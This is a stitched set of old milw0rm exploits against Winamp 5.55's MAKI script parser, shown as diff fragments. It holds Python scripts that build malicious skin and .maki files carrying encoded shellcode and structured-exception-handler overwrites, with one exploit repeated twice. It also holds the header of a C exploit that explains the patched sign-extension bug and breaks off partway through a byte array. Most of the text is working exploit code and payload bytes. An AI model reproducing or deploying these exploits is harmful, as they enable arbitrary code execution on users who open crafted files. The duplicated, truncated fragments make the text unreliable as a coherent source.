"\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21"
"\x01\x01\x00\x00\x00\x21")
skin_xml=(
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64"
"\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\x79"
"\x65\x73\x22\x3f\x3e\x0d\x0a\x0d\x0a\x3c\x57\x69\x6e\x61\x6d\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69"
"\x6f\x6e\x4c\x61\x79\x65\x72\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x33\x34\x22\x3e\x0d\x0a"
"\x09\x3c\x73\x6b\x69\x6e\x69\x6e\x66\x6f\x3e\x0d\x0a\x09\x09\x3c\x76\x65\x72\x73\x69\x6f\x6e\x3e\x31"
"\x2e\x32\x3c\x2f\x76\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x09\x09\x3c\x6e\x61\x6d\x65\x3e\x42\x65\x6e"
"\x74\x6f\x3c\x2f\x6e\x61\x6d\x65\x3e\x0d\x0a\x09\x09\x3c\x61\x75\x74\x68\x6f\x72\x3e\x48\x69\x73\x30"
"\x6b\x34\x3c\x2f\x61\x75\x74\x68\x6f\x72\x3e\x0d\x0a\x09\x09\x3c\x63\x6f\x6d\x6d\x65\x6e\x74\x3e\x48"
"\x69\x73\x30\x6b\x34\x3c\x2f\x63\x6f\x6d\x6d\x65\x6e\x74\x3e\x0d\x0a\x09\x09\x3c\x65\x6d\x61\x69\x6c"
"\x3e\x48\x69\x73\x30\x6b\x34\x2e\x68\x6c\x6d\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3c\x2f\x65\x6d"
"\x61\x69\x6c\x3e\x0d\x0a\x09\x09\x3c\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x3e\x48\x69\x73\x30\x6b"
"\x34\x2e\x70\x6e\x67\x3c\x2f\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x3e\x0d\x0a\x09\x09\x3c\x68\x6f"
"\x6d\x65\x70\x61\x67\x65\x3e\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x73\x6e\x61\x6b\x65\x73\x70"
"\x63\x2e\x63\x6f\x6d\x2f\x3c\x2f\x68\x6f\x6d\x65\x70\x61\x67\x65\x3e\x0d\x0a\x09\x3c\x2f\x73\x6b\x69"
"\x6e\x69\x6e\x66\x6f\x3e\x0d\x0a\x0d\x0a\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x74\x69\x6f\x6e\x3d\x22\x67\x65\x6e\x65\x72\x61\x6c\x22\x3e\x0d\x0a\x09\x09\x3c\x61\x63"
"\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x46\x22\x20\x61\x63"
"\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x46\x49\x4c\x45\x22\x20\x2f\x3e"
"\x0d\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c"
"\x74\x2b\x50\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x50"
"\x4c\x41\x59\x22\x20\x2f\x3e\x0d\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62"
"\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x4f\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48"
"\x4f\x54\x4b\x45\x59\x5f\x4f\x50\x54\x49\x4f\x4e\x53\x22\x20\x2f\x3e\x0d\x0a\x09\x09\x3c\x61\x63\x63"
"\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x49\x22\x20\x61\x63\x74"
"\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x56\x49\x45\x57\x22\x20\x2f\x3e\x0d"
"\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74"
"\x2b\x48\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x48\x45"
"\x4c\x50\x22\x20\x2f\x3e\x0d\x0a\x09\x3c\x2f\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x3e\x0d"
"\x0a\x0d\x0a\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x20\x73\x65\x63\x74\x69\x6f\x6e"
"\x3d\x22\x6e\x6f\x72\x6d\x61\x6c\x22\x3e\x0d\x0a\x09\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74"
"\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x73\x70\x61\x63\x65\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x53"
"\x48\x4f\x57\x5f\x43\x55\x52\x52\x45\x4e\x54\x5f\x54\x52\x41\x43\x4b\x22\x20\x2f\x3e\x0d\x0a\x09\x3c"
"\x2f\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x3e\x0d\x0a\x0d\x0a\x09\x3c\x21\x2d\x2d\x20\x54"
"\x68\x69\x73\x20\x53\x6b\x69\x6e\x20\x75\x73\x65\x73\x20\x73\x68\x61\x72\x65\x64\x20\x47\x72\x61\x70"
"\x68\x69\x63\x73\x2c\x20\x58\x4d\x4c\x20\x61\x6e\x64\x20\x4d\x61\x6b\x69\x20\x66\x72\x6f\x6d\x20\x27"
"\x42\x69\x67\x20\x42\x65\x6e\x74\x6f\x27\x20\x2d\x2d\x3e\x0d\x0a\x0d\x0a\x09\x3c\x73\x63\x72\x69\x70"
"\x74\x73\x3e\x0d\x0a\x09\x09\x3c\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6c\x65\x3d\x22\x2f\x73\x63\x72"
"\x69\x70\x74\x73\x2f\x32\x37\x2e\x6d\x61\x6b\x69\x22\x20\x70\x61\x72\x61\x6d\x3d\x22\x73\x6d\x61\x6c"
"\x6c\x22\x2f\x3e\x20\x3c\x21\x2d\x2d\x20\x4d\x75\x73\x74\x20\x62\x65\x20\x6c\x6f\x61\x64\x65\x64\x20"
"\x61\x74\x20\x66\x69\x72\x73\x74\x20\x2d\x2d\x3e\x0d\x0a\x09\x3c\x2f\x73\x63\x72\x69\x70\x74\x73\x3e"
"\x0d\x0a\x0d\x0a\x3c\x2f\x57\x69\x6e\x61\x6d\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6f\x6e\x4c\x61"
"\x79\x65\x72\x3e")
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x53\x4b\x48\x4e\x47"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x48"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x33\x45\x58\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x58\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x56\x43\x46\x42\x50\x5a")
payload = "\x41"*16756
payload += "\x74\x06\x90\x90"
payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod.dll
payload += shellcode
try:
os.mkdir("dz_skin")
os.mkdir("dz_skin/scripts")
out_maki = open(r'dz_skin/scripts/27.maki', 'w')
out_maki.write(header1+payload+header2)
out_maki.close()
out_xml = open(r'dz_skin/skin.xml', 'w')
out_xml.write(skin_xml)
out_xml.close()
raw_input("\nSkin's files created!\n")
except:
print "Error"
# milw0rm.com [2009-05-22]


@ -1,107 +1,107 @@
# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
# just edit the calculations of the chars
#
header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
"\x6C\x73\x37\x00")
ex = (
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF")
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
"\x70\x41")
chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"\xeb\x12\x41\x41"+"\x11\x10\xf0\x14"+"\x90"*20+shellcode+chars2)
file.close()
# milw0rm.com [2009-05-22]
# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
# just edit the calculations of the chars
#
header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
"\x6C\x73\x37\x00")
ex = (
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF")
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
"\x70\x41")
chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"\xeb\x12\x41\x41"+"\x11\x10\xf0\x14"+"\x90"*20+shellcode+chars2)
file.close()
# milw0rm.com [2009-05-22]


@ -1,356 +1,356 @@
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552
Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3 <eng>
<Vista sp1> And all worked fine.
I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!
Below i have provided a look into the disassembly of the new
changes in the 555.2 version of winamp the main change was in
gen_ff.dll.
---snip--
A quick look at the new gen_ff.dll.
----------------------------------
loc_12094F62:
mov ax, [ebx]
movzx edi, ax -Extends ax into edi register.-
inc ebx
push edi ; Size
inc ebx
lea eax, [ebp+MultiByteStr]
push ebx ; Src
push eax ; Dst
call memmove
------------------------
loc_120951E9:
mov edi, [ebx]
add ebx, 4
mov ax, [ebx]
movzx esi, ax -Extends ax into esi register.-
inc ebx
push esi ; Size
inc ebx
lea eax, [ebp+var_2014C] <-- This was also changed.
push ebx ; Src
push eax ; Dst
call memmove
This is a simple run down of the new patch
that was applied to winamp winamp 5.552 If we look closely we can see they
changed the sign extension.
=555.1 .dll=
----------
movsx esi, ax = movsx(dest , source );
Copies source operand dest and extends the value.
Changed in the new gen_ff.dll.
=555.2 .dll=
----------
movzx esi, ax
Zero extend the 8 bit registers.
Copies data and sign extends the data while copying it.
Destination= 16 - 32 bit.
Source = 8 or a 16byte or maybe even 1 byte of memory
Source = the destination must be of greater value than the source.
This was a few of the changes within the new dll from winamp.Im
sure if you want to dig deeper you can get both dll and compare them
to see the changes that are made.So basically they have changed the
instruction from Copy with sign extension to copy with zero extension.
This can also be displayed when looking at the stack at the time of the
exception in the new version of winamp after steeping through the exception
although we can cause and exception we cant overwrite the 4 bytes on the
stack we can only overwrite 2 and it is always capped with 00FF.
---snip--
Special thanks to str0ke :)
Credits to n00b for writing exploit code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
***************************************************************/
#include <stdio.h>
#define MAKI "mcvcore.maki"
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
